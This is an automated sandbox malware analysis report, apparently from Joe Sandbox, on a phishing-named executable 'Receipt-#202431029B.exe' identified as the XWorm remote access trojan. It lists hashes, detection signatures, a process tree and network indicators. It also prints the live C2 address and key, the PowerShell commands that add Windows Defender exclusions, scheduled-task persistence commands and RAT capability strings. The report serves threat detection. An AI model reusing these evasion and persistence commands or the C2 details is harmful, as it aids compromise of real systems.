
Windows Analysis Report
Receipt-#202431029B.exe

Overview

General Information

Sample name: Receipt-#202431029B.exe
Analysis ID: 1582779
MD5: 5322ece916271ad6517a171be2a5a378
SHA1: a6e2f7e14a60a184a58b37a6aa1593210ebfa6bd
SHA256: 4c839863452a16a4d99b13065cf93b09547d04b86ba649a8b40976122ff67a74
Tags: exe, njrat, user-julianmckein

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Receipt-#202431029B.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\Receipt-#202431029B.exe" MD5: 5322ECE916271AD6517A171BE2A5A378)
    • powershell.exe (PID: 7740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8092 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7844 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Receipt-#202431029B.exe (PID: 8004 cmdline: "C:\Users\user\Desktop\Receipt-#202431029B.exe" MD5: 5322ECE916271AD6517A171BE2A5A378)
      • WerFault.exe (PID: 5368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 2132 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • XetHVID.exe (PID: 8064 cmdline: C:\Users\user\AppData\Roaming\XetHVID.exe MD5: 5322ECE916271AD6517A171BE2A5A378)
    • schtasks.exe (PID: 2004 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • XetHVID.exe (PID: 5260 cmdline: "C:\Users\user\AppData\Roaming\XetHVID.exe" MD5: 5322ECE916271AD6517A171BE2A5A378)
  • cleanup
{"C2 url": ["154.39.0.150"], "Port": 5200, "Aes key": "1987", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara matches in memory dumps (Source / Rule / Description / Author / Strings):

Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
Strings:
  • 0x87d5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8872:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8987:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8367:$cnc4: POST / HTTP/1.1

Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp
Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
Strings:
  • 0x542c9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x54366:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5447b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x53e5b:$cnc4: POST / HTTP/1.1

Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings):

Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack
Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
Strings:
  • 0x51d5:$str01: $VB$Local_Port
  • 0x51c6:$str02: $VB$Local_Host
  • 0x548a:$str03: get_Jpeg
  • 0x4eb3:$str04: get_ServicePack
  • 0x61f7:$str05: Select * from AntivirusProduct
  • 0x63f3:$str06: PCRestart
  • 0x6407:$str07: shutdown.exe /f /r /t 0
  • 0x64b9:$str08: StopReport
  • 0x648f:$str09: StopDDos
  • 0x6585:$str10: sendPlugin
  • 0x6723:$str12: -ExecutionPolicy Bypass -File "
  • 0x684c:$str13: Content-length: 5235

Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack
Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
Strings:
  • 0x6bd5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6c72:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6d87:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6767:$cnc4: POST / HTTP/1.1

Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack
Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack
Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
Strings:
  • 0x6fd5:$str01: $VB$Local_Port
  • 0x6fc6:$str02: $VB$Local_Host
  • 0x728a:$str03: get_Jpeg
  • 0x6cb3:$str04: get_ServicePack
  • 0x7ff7:$str05: Select * from AntivirusProduct
  • 0x81f3:$str06: PCRestart
  • 0x8207:$str07: shutdown.exe /f /r /t 0
  • 0x82b9:$str08: StopReport
  • 0x828f:$str09: StopDDos
  • 0x8385:$str10: sendPlugin
  • 0x8523:$str12: -ExecutionPolicy Bypass -File "
  • 0x864c:$str13: Content-length: 5235

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", ProcessId: 7740, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\Receipt-#202431029B.exe, ProcessId: 8004, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab.lnk
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\XetHVID.exe, ParentImage: C:\Users\user\AppData\Roaming\XetHVID.exe, ParentProcessId: 8064, ParentProcessName: XetHVID.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp", ProcessId: 2004, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", ProcessId: 7844, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", ProcessId: 7740, ProcessName: powershell.exe

            Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", ProcessId: 7844, ProcessName: schtasks.exe
            No Suricata rule has matched


            AV Detection

Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["154.39.0.150"], "Port": 5200, "Aes key": "1987", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\Notepab.exe; ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\XetHVID.exe; ReversingLabs: Detection: 73%
Source: Receipt-#202431029B.exe; ReversingLabs: Detection: 73%
Source: Receipt-#202431029B.exe; Virustotal: Detection: 43%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\XetHVID.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Notepab.exe; Joe Sandbox ML: detected
Source: Receipt-#202431029B.exe; Joe Sandbox ML: detected
Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; String decryptor: 154.39.0.150
Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; String decryptor: 5200
Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; String decryptor: 1987
Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; String decryptor: <Xwormmm>
Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; String decryptor: XWorm V5.6
Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; String decryptor: USB.exe
Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; String decryptor: %AppData%
Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; String decryptor: Notepab.exe
Source: Receipt-#202431029B.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Receipt-#202431029B.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbyhR source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb0 source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Users\user\Desktop\Receipt-#202431029B.PDB source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb` source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbahz source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Core.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007523000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdblX source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Windows.Forms.pdbxX source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: RVYv.pdbSHA256 source: Receipt-#202431029B.exe, XetHVID.exe.0.dr, Notepab.exe.8.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: Microsoft.VisualBasic.pdbP source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Users\user\Desktop\RVYv.pdb, source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.pdb@ source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbHH source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Xml.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: o.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: %%.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007519000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp, WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\RVYv.pdbpdbVYv.pdb@V source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RVYv.pdb source: Receipt-#202431029B.exe, XetHVID.exe.0.dr, Notepab.exe.8.dr
            Source: Binary string: System.Management.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Drawing.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\symbols\exe\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: RVYv.pdb21-2246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32ine\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr

            Networking

Source: Malware configuration extractor; URLs: 154.39.0.150
Source: Yara match; File source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.4:49735 -> 154.39.0.150:5200
Source: Joe Sandbox View; ASN Name: COGENT-174US
Source: unknown; TCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: Receipt-#202431029B.exe, 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4102389943.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, XetHVID.exe, 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
